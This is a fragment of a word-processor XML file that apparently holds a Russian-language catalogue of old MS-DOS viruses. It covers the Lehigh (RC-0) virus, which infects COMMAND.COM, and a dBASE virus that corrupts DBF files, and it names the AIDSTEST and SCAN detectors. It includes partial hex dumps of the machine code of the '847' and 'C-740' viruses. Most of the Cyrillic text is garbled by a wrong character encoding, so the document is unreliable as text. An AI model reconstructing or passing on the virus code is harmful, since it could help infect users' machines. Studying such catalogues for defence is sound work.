        <w:t>-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: EB 14 90 49 56 01 2A 2E  43 4F 4D 00 4F 04 00 00   ...IV.*.COM.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: 01 00 00 00 00 00 8C C8  05 00 10 8E C0 FE 06 05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: 01 BE 00 01 33 FF B9 4F  01 F3 A4 BA 5F 02 B4 1A   ....3..O...._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0: CD 21 BA 06 01 B9 06 00  B4 4E CD 21 72 60 BA 7D   .!.......N.!r`.}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: 02 B8 02 3D CD 21 A3 14  01 8B D8 06 1F BA 4F 03   ...=.!.......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0: B9 FF FF B4 3F CD 21 05  4F 03 2E A3 12 01 3E 81   ....?.!.O.....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0: 3E 52 03 49 56 74 21 33  C9 8B D1 2E 8B 1E 14 01   &gt;R.IVt!3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...   ...   ...   ...    ...   ...   ...   ...     ...   ...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0: CD 21 CD 20 50 72 6F 67  72 61 6D 20 73 69 63 6B   .!. Program s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0: 20 65 72 72 6F 72 3A 43  61 6C 6C 20 64 6F 63 74    error:Call doc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0: 6F 72 20 6F 72 20 62 75  79 20 50 49 58 45 4C 20   or or buy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00F0: 66 6F 72 20 63 75 72 65  20 64 65 73 63 72 69 70   for cure de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: 74 69 6F 6E 0A 0D 24 BE  24 02 B9 2B 00 33 FF F3   tion..$.$..+.3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: A4 33 FF 2E C7 06 0E 01  00 00 2E 8C 06 10 01 2E   .3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0: FF 2E 0E 01 1E 07 BE 4F  04 80 3E 05 01 01 75 04   .......O..&gt;...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...   ...   ...   ...    ...   ...   ...   ...     ...   ...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0: 50 8D 46 AE 50 9A 43 87  75 18 83 C4 04 9A 80 85   P.F.P.C.u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0: 75 18 FF 76 08 8D 86 5E  FF 50 8D 46 AE 50 E8 A8   u..v...^.P.F.P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0: 05 83 C4 06 89 46 FE 3D  FF FF 74 05 3D 01 00 75   .....F.=..t.=..u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0: 03 E8 A0 D0 83 7E FE 01  74 03 E9 47 FE 83 7E 08   .....~..t..G..~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0: 00 75 28 8D 46 AE 50 9A  94 87 75 18 83 C4 02 B4   .u(.F.P...u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0: 09 BA 09 01 CD 21 CD 20  38 34 37 20 56 69 72 75   .....!. 847 Viru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0: 73 20 38 34 37 20 62 79  74 65 73 20 21 24         s 847 bytes !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.3. C-740 (Can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740 �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஫���� � ᢮��� ������ � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㫥</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>裡 � 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ࠦ���� �ந�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室�� �������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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �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 � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᥭ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1989 ���� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭮� ��᪥� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ଠ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.�.�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠�� ����� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>IV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⥪�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SCAN ����� ����� �� ��⥪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ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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祭�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� ����� ����ᮬ ����� �ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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䠣 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AIDSTEST �.�.�����᪮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ࠣ���� �஧�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䨫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� ����ᮬ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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: EB 14 90 49 56 01 2A 2E  43 4F 4D 00 E4 03 00 00   ...IV.*.COM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: 00 00 00 00 00 00 8C C8  05 00 10 8E C0 FE 06 05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: 01 BE 00 01 33 FF B9 E4  00 F3 A4 BA F4 01 B4 1A   ....3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0: CD 21 BA 06 01 B9 06 00  B4 4E CD 21 72 57 BA 12   .!.......N.!rW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: 02 B8 02 3D CD 21 A3 14  01 8B D8 06 1F BA E4 02   ...=.!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...   ...   ...   ...    ...   ...   ...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0: 4B 2D 83 C4 04 89 86 5C  FF 83 3E 1A 1E 00 74 1D   K-.....\..&gt;..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0: 83 3E 1C 1E 00 75 16 B8  2B 4B 50 9A 94 87 75 18   .&gt;...u..+KP...u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0: 83 C4 02 0B C0 74 06 C7  06 1C 1E 01 00 FF B6 5C   .....t.........\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0: FF 8D 46 AE 50 9A 6A 86  75 18 83 C4 04 FF 76 06   ..F.P.j.u....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0: 8D 86 5E FF 50 9A 6A 86  75 18 83 C4 04 FF 76 08   ..^.P.j.u....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0: 8D 46 AE 50 8D 86 5E FF  50 E8 F6 00 83 C4 06 89   .F.P..^.P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0: 86 54 FF 3D FE FF 75 03  E9 F9 FE FF 36 1C 1E FF   .T.=..u.....6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0: B6 5C FF E8 79 41 83 C4  04 89 86 56 FF 3D FF FF   .\..yA.....V.=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0: 75 03 E9 DF FE 0B C0 74  2C 83 7E 08 00 75 26 FF   u......t,.~..u&amp;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B0: 36 1A 1E 8D 86 5E FF 50  E8 54 41 83 C4 04 89 86   6....^.P.TA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C0: 58 FF 3D FF FF 75 03 E9  BA FE 3D 01 00 1B C0 F7   X.=..u....=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D0: D8 89 86 56 FF 8D 46 AE  50 9A 04 87 75 18 83 C4   ...V..F.P...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0: 02 0B C0 75 B4 09 BA 09  01 CD 21 CD 20 37 34 30   ...u......!. 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F0: 20 56 69 72 75 73 20 37  34 30 20 62 79 74 65 73    Virus 74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0: 20 21 24                                            !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8. ������� ������, ������� ⮫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쪮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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㯮�������� � ���㡥���� �������  䠩�����  �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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뤥���� �� �뫨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਢ������ ᮡ࠭�� ���஬ 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⠪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.1. ����� RC-0 (Lehigh - ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>堩</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>易�� � ⥬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� �� ����� �� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥� � 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Lehigh (���) � ���� 1987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RC-0 ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㧪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯥ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樠����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஢���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१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ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �����  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">࠭���� �१ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COMMAND.COM (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MS DOS).  ������ ����� ����� ������� "��⥬�� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>", ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 �� ⮬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ��� ⮫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쪮 �������� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ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>⠪�� �������� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ⠪ ��� ��� �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���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ꥬ����� ����� ����樮���� ��⥬�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>롮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⫨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稥 �� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭������ ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ���� �⠭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⠢�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">塞� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS DOS (COMMAND.COM) � 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࠭����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� �� ���� �����⢥��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㥬�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.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 �� ��, ������ ���� ������, ���⠢���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᢮� ���ᨨ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS DO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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬ � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮��⥫� ���  ��設  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⠫��������  � COMMAND.COM � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠪ��� �ਣ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">襭��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>C:\.  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬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 ���쬠 ������ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢮ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᠭ��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COMMAND.COM  (�  �  �⢥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ᨨ  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS DOS �� �� ⮫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쪮 ���� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠭ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� � �� "��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࠤ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>�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",  �.�. ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ��� ���� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祬 �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">10� ��� ����⢥����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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㭪樮������  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>৬�����⥩</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>) �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢���� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮��⥫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�� �������� ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>4DOS (��� J.P.  Software).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ਭ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">樯� �롮� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COMMAND.COM ��� "�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭��" ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祬 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਭ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樯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쭮 �� �⫨砥��� �� �롮�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᪠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Norton 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Lehigh ���������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮� ⥫� � �������  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ��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��� �⥪�.  ���⮬� ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COMMAND.COM �� �⫨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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ଠ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">.  ������ ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥡ� � ������� �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 RC-0 ������� ���� ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COMMAND.COM ⠪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⮡� ���� ������� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ�����  ��᫥  ���  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㧪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. 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��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㧪� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">COMMAND.COM ��⠥��� � �����, ����� �⠭������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१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RC-0 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">墠�뢠�� ���뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">21 � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ����⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ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>"�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">" � "���� ����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>".  ��  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ�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ᮢ ����� ᭠</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ���� �� ��� ��⥬�� (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ᮤ�ন� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COMMAND.COM).  �᫨ ��,  � �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COMMAND.COM ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠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�  ����  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㢥��稢��� ���稪</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䨣��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(EC 1840) ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稪 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭���� � �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>稨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稪  �����뢠����  �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㧪� ��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稪 �� ���� ��� �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  � � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६� ��� ��  ����  �  ���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��稪� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⨦���� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稪�� ���祭�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>4 ����� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室�� � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ﭨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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⮭�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ����  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠���  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">26,  ��  ������ ���� 32 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥪ�� 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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ண� �� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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㦥��� ������� ����� ��頥��� � �裡 � ⥬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� ��-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 xml:space="preserve">஢���� ⥫� ����� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COMMAND.COM  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ������  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠭���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MS DOS, �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ਢ���� � ��������� ���� ᮧ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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, ����� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭 ��� ��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. �-�����, � �⫨-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>稥 �� ������ ��㣨� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᬠ�ਢ����� ����� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">RC-0 �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ਡ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>READ ONLY. ���⮬�, �᫨ COMMAND.COM ����� ��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਡ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 �� ������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� � �������� "�⠬���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"������⪨" ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �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⨯  �����  �⭮���� � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">-��������.  ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥 㪠�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 ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">稫 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮� �������� ��������� ⮬�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� �� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦥� � 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 � Lehigh (Bethlehem, ���) � ���� 1987 �. �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮢ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-��������,  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭���� ���ண�  �ਭ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>﫮  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 �������� �������� ��� �⠬��, ���� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㢥��稢�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ࠦ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COMMAND.COM, � ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㣮� 㢥��稢��� �� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>20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� �� �⬥</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. ��������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᢥ����� �������� �� ���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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㡥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⮤� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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���� ������⥪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">SCAN.  ����� ��� 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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬ �� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � �� �� COMSPEC, ���⮬� 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 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>頥� �������� ������ ��  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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㦥 㪠�뢠����  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭠� ����� ����� �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ਡ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>READ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 �᫨ �������� ������ ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭 �⨬ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਡ�⮬</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⢥ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠣� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>CLEAR, ���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९����  �������� ������ ������ � ����ਡ�⨢��� ����� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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.2. ����� d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dBASE ����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������  ����ᮬ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �����  ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">21 � ���� ����⪨ ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">७��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DBF. 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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">騩 ���� 䠩�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(file handle)  �  ⥪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 ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">७��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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� ��᫥����� ������ �� ����� � �⮩ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪠������ ����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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �� ���� ��� ���� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠����� ����� 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�� ��᫥����� ������� �⥭�� ����� ����⠭�������� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ࢮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 ���⮢</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">,  ⠪ �� � �� ��� ���� ����� ����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ଠ�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠥��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ�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१ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">90  ���� ����� </w:t>
      </w:r>
      <w:r>
